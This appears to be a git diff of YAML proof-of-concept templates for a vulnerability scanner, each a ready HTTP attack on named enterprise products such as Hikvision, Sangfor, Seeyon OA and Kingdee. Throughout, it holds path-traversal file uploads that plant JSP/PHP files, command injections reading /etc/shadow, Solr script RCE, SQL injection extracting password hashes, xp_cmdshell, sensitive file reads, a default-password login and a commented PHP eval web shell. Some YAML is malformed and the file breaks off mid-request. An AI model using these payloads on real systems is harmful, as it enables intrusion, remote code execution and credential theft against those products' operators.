- severity: "High"
- verified: false
- description: "app=\"泛微\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/a.svg.jsp"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "{\"__CONTENT__\":\"<%out.println(\"202cb962ac59075b964b07152d234b70\");%>\", \"__CHARSET__\":\"UTF-8\"}"
- matchers: ""
- rule1:
- requests:
- method: "GET"
- path: "/WebReport/a.svg.jsp"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"202cb962ac59075b964b07152d234b70\") && equalsFunc(r\\.StatusCode, 200)"
-
- - id: "HiKVISION 综合安防管理平台 report 任意文件上传漏洞"
- info:
- name: "HiKVISION 综合安防管理平台 report 任意文件上传漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"HiKVISION\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/svm/api/external/report"
- allow_redirects: false
- headers:
- content-type: "multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "\
- ------WebKitFormBoundary9PggsiM755PLa54a\r\n
- Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp\"\r\n
- Content-Type: application/zip\r\n
- \r\n
- qaxnb
- \r\n
- ------WebKitFormBoundary9PggsiM755PLa54a--\r\n
- "
- matchers: ""
- rule1:
- requests:
- method: "GET"
- path: "/portal/ui/login/..;/..;/new.jsp"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"qaxnb\") && equalsFunc(r\\.StatusCode, 200)"
-
- - id: "HiKVISION 综合安防管理平台 files 任意文件上传漏洞"
- info:
- name: "HiKVISION 综合安防管理平台 files 任意文件上传漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"HiKVISION\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/center/api/files;.html"
- allow_redirects: true
- headers:
- content-type: "multipart/form-data; boundary=----------------------------180188939909122941133151"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "\
- ----------------------------180188939909122941133151\r\n
- Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/hello.jsp\"\r\n
- Content-Type: application/octet-stream\r\n
- \r\n
- hello
- \r\n
- ----------------------------180188939909122941133151--\r\n
- "
- matchers: ""
- rule1:
- requests:
- method: "GET"
- path: "/clusterMgr/hello.jsp;.js"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"hello\") && equalsFunc(r\\.StatusCode, 200)"
-
- - id: "Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞"
- info:
- name: "Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "title=\"index\" && header=\"lighttpd/1.4.30\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921"
- allow_redirects: true
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"PING 1.1.1.1\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "网神SecGate 3600 obj_app_upfile"
- info:
- name: "网神SecGate 3600 obj_app_upfile"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "fid=\"1Lh1LHi6yfkhiO83I59AYg==\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/?g=obj_app_upfile;"
- allow_redirects: true
- headers:
- content-type: "multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "\
- ------WebKitFormBoundaryJpMyThWnAxbcBBQc\r\n\
- Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\
- \r\n\
- 10000000\r\n\
- ------WebKitFormBoundaryJpMyThWnAxbcBBQc\r\n\
- Content-Disposition: form-data; name=\"upfile\"; filename=\"qaxnb.php\"\r\n\
- Content-Type: text/plain\r\n\
- \r\n\
- \r\n\
- \r\n\
- \r\n\
- ------WebKitFormBoundaryJpMyThWnAxbcBBQc\r\n\
- Content-Disposition: form-data; name=\"submit_post\"\r\n\
- \r\n\
- obj_app_upfile\r\n\
- ------WebKitFormBoundaryJpMyThWnAxbcBBQc\r\n\
- Content-Disposition: form-data; name=\"__hash__\"\r\n\
- \r\n\
- 0b9d6b1ab7479ab69d9f71b05e0e9445\r\n\
- ------WebKitFormBoundaryJpMyThWnAxbcBBQc--\r\n\
- "
- matchers: ""
- rule1:
- requests:
- method: "GET"
- path: "/attachements/qaxnb.php"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"uid\") && equalsFunc(r\\.StatusCode, 200)"
-
- - id: "亿赛通电子文档安全管理系统远程命令执行漏洞"
- info:
- name: "亿赛通电子文档安全管理系统远程命令执行漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"亿赛通-电子文档安全管理系统\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20"
- allow_redirects: true
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "\
- \r\n\
- \r\n\
- \r\n\
- \r\n\
- "
- matchers: "containsFunc(r\\.Text, \"nt authority\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "深信服应用交付 AD 远程命令执行漏洞"
- info:
- name: "深信服应用交付 AD 远程命令执行漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "fid=\"iaytNA57019/kADk8Nev7g==\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/rep/login"
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123"
- matchers: "containsFunc(r\\.Text, \"uid\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "安恒明御安全网关rce"
- info:
- name: "安恒明御安全网关rce"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "body=\"/webui/images/basic/login/\" && title==\"明御安全网关\""
- rules:
- rule0:
- requests:
- method: "GET"
- # path: "/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+\"<%3fphpteval(\\$_POST[\"a\"]) ;?>\"+>+.qaxnb.php"
- path: "/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix={{urlenc(\"id+>/usr/local/webui/test.txt\")}}"
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"success\") && containsFunc(r\\.Text, \"local_logo\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: "GET"
- path: "/test.txt"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "网康科技-下一代防火墙"
- info:
- name: "网康科技-下一代防火墙rce"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"网康科技-下一代防火墙\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/directdata/direct/router"
- allow_redirects: true
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "\
- {\r\n
- \"action\": \"SSLVPN_Resource\",\r\n
- \"method\": \"deleteImage\",\r\n
- \"data\":[{\r\n
- \"data\":[\"/var/www/html/b.txt;echo ''>/var/www/html/test.php\"]\r\n
- }],\r\n
- \"type\": \"rpc\",\r\n
- \"tid\": 17\r\n
- }\r\n
- "
- matchers: "containsFunc(r\\.Text, \"rpc\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: "GET"
- path: "/test.php"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "PigCMS_action_flashUpload_upload"
- info:
- name: "PigCMS_action_flashUpload_upload"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"网康科技-下一代防火墙\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/cms/manage/admin.php?m=manage&c=background&a=action_flashUpload"
- allow_redirects: false
- headers:
- content-type: "multipart/form-data; boundary=----aaa"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "\
- ------aaa\r\n\
- Content-Disposition: form-data; name=\"filePath\"; filename=\"test.php\"\r\n\
- Content-Type: video/x-flv\r\n\
- \r\n\
- \r\n\
- ------aaa\r\n\
- "
- matchers: "containsFunc(r\\.Text, \".php\") && containsFunc(r\\.Text, \"upload/images\")"
- rule1:
- requests:
- method: "GET"
- path: "/test.php"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "Milesight VPN server.js 任意文件读取漏洞"
- info:
- name: "Milesight VPN server.js 任意文件读取漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "MilesightVPN"
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/%2e%2e/etc/passwd"
- allow_redirects: false
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"/bin/bash\") && containsFunc(r\\.Text, \"root\")"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "飞企互联FE业务协作平台ShowImageServlet任意文件读取"
- info:
- name: "飞企互联FE业务协作平台ShowImageServlet任意文件读取"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "flyrise.stopBackspace.js"
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"mssql\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "金蝶云星空CommonFileserver任意文件读取漏洞"
- info:
- name: "金蝶云星空CommonFileserver任意文件读取漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "flyrise.stopBackspace.js"
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/CommonFileServer/c:/windows/win.ini"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"files\") && containsFunc(r\\.Text, \"fonts\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "企望制造_ERP_comboxstore远程命令执行"
- info:
- name: "企望制造_ERP_comboxstore远程命令执行"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "title=\"企望制造ERP系统\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/mainFunctions/comboxstore.action"
- allow_redirects: false
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "comboxsql=exec%20xp_cmdshell%20'type%20C:\\Windows\\Win.ini'"
- matchers: "containsFunc(r\\.Text, \"files\") && containsFunc(r\\.Text, \"fonts\")"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "启明星辰4A统一安全管控平台getMaster信息泄漏"
- info:
- name: "启明星辰4A统一安全管控平台getMaster信息泄漏"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "body=\"cas/css/ace-part2.min.css\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/accountApi/getMaster.do"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"true\") && containsFunc(r\\.Text, \"password\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "Panabit iXCache网关弱口令和RCE漏洞"
- info:
- name: "Panabit iXCache网关弱口令和RCE漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "body=\"cas/css/ace-part2.min.css\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/login/userverify.cgi"
- allow_redirects: true
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "username=admin&password=ixcache"
- matchers: "Set-Cookie"
- rule1:
- requests:
- method: "POST"
- path: "/cgi-bin/Maintain/date_config"
- allow_redirects: false
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: "ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1"
- matchers: "containsFunc(r\\.Text, \"root\")"
\ No newline at end of file
diff --git a/poc/poc1.yaml b/poc/poc1.yaml
deleted file mode 100644
index 95b5713..0000000
--- a/poc/poc1.yaml
+++ /dev/null
@@ -1,278 +0,0 @@
-poc_content:
- - id: "HiKVISION综合安防管理平台env信息泄漏"
- info:
- name: "HiKVISION综合安防管理平台env信息泄漏"
- author: "小燕子"
- severity: "High"
- verified: true
- description: "app=\"HIKVISION-综合安防管理平台\""
- rules:
- rule:
- requests:
- method: "GET"
- path: "/artemis-portal/artemis/env"
- cookie: "20230925"
- allow_redirects: true
- headers:
- content-type: "application/json"
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie:
- body: ""
- matchers: "strings.Contains(string(respBody), "bootstrapProperties") && strings.Contains(string(respBody), "profiles") && resp.StatusCode == 200"
-
- - id: "FanWei-FileRead"
- info:
- name: "FanWei-FileRead漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "泛微OA文件读取漏洞"
- rules:
- rule:
- requests:
- method: "GET"
- path: "/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
- allow_redirects: false
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie:
- body:
- matchers: ""
-
- - id: "广联达Linkworks_GetIMDictionary_SQL"
- info:
- name: "广联达Linkworks_GetIMDictionary_SQL注入漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "body=\"/Services/Identification/\""
- rules:
- rule:
- requests:
- method: "POST"
- path: "/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary"
- allow_redirects: false
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent": "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie:
- body: "key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --"
- matchers: ""
-
- - id: "泛微OA-E-Office-uploadify 文件上传"
- info:
- name: "泛微OA-E-Office-uploadify 文件上传"
- author: "小燕子"
- severity: "critical"
- verified: true
- description: "app=\"泛微-EOffice\""
- rules:
- rule:
- requests:
- method: "POST"
- path: "/inc/jquery/uploadify/uploadify.php"
- allow_redirects: false
- headers:
- content-type: "multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4"
- user-agent: " Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
- cookie: ""
- body: "\
- --e64bdf16c554bbc109cecef6451c26a4\r\n\
- Content-Disposition: form-data; name=\"Filedata\"; filename=\"qax.php\"\r\n\
- Content-Type: image/jpeg\r\n\
- \r\n\
- \r\n\
- "
- matchers: "lengthFunc(r\\.Text, 10) && equalsFunc(r\\.StatusCode, 200)"
- - id: "广联达Linkworks_GetIMDictionary_SQL"
- info:
- name: "广联达Linkworks_GetIMDictionary_SQL"
- author: "小燕子"
- severity: "critical"
- verified: true
- description: "body=\"/Services/Identification/\""
- rules:
- rule:
- requests:
- method: "POST"
- path: "/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: " Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
- cookie: ""
- body: "key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --"
- matchers: "regexFunc(\"\\[0\\-9a\\-fA\\-F\\]\\{32\\}\", r\\.Text)"
- - id: "大华智慧园区综合管理平台SQL"
- info:
- name: "大华智慧园区综合管理平台SQL"
- author: "小燕子"
- severity: "critical"
- verified: true
- description: "app=\"dahua-智慧园区综合管理平台\""
- rules:
- rule:
- requests:
- method: "GET"
- path: "/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B"orderBy":"1%20and%201=updatexml(1,concat(0x7e,(select%20MD5(123456)),0x7e),1)--"%7D/extend/%7B%7D"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: " Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
- cookie: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"e10adc3949ba59abbe56e057f20f883\")"
-
-
-
- - id: "致远OA v8文件上传漏洞"
- info:
- name: "致远OA v8文件上传漏洞漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"通达OA\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/seeyon/wpsAssistServlet"
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"flag is empty\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "致远OA A6 test.jsp SQL注入漏洞"
- info:
- name: "致远OA A6 test.jsp SQL注入漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"致远OA\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(123))"
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"202cb962ac59075b964b07152d234b70\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "致远OA getSessionList.jsp Session泄漏漏洞"
- info:
- name: "致远OA getSessionList.jsp Session泄漏漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"致远OA\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"SessionList\") && containsFunc(r\\.Text, \"seesionID\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "通达htmlofficeservlet命令执行"
- info:
- name: "通达htmlofficeservlet命令执行漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"致远OA\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/seeyon/htmlofficeservlet"
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "\
- Cache-Control: max-age=0\r\n\
- Content-Type: application/x-www-form-urlencoded\r\n\
- User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML, likeGecko) Chrome/92.0.4515.159 Safari/537.36\r\n\
- Accept-Encoding: gzip, deflate\r\n\
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n
- Connection: close\r\n
- \r\n\
- DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r\n\
- OPTION=S3WYOSWLBSGr
- currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\n\
- CREATEDATE=wUghPB3szB3Xwg66\r\n\
- RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\n\
- originalFileId=wV66\r\n\
- originalCreateDate=wUghPB3szB3Xwg66\r\n\
- FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6\r\n\
- needReadFile=yRWZdAS6\r\n\
- originalCreateDate=wLSGP4oEzLKAz4=iz=66\r\n\
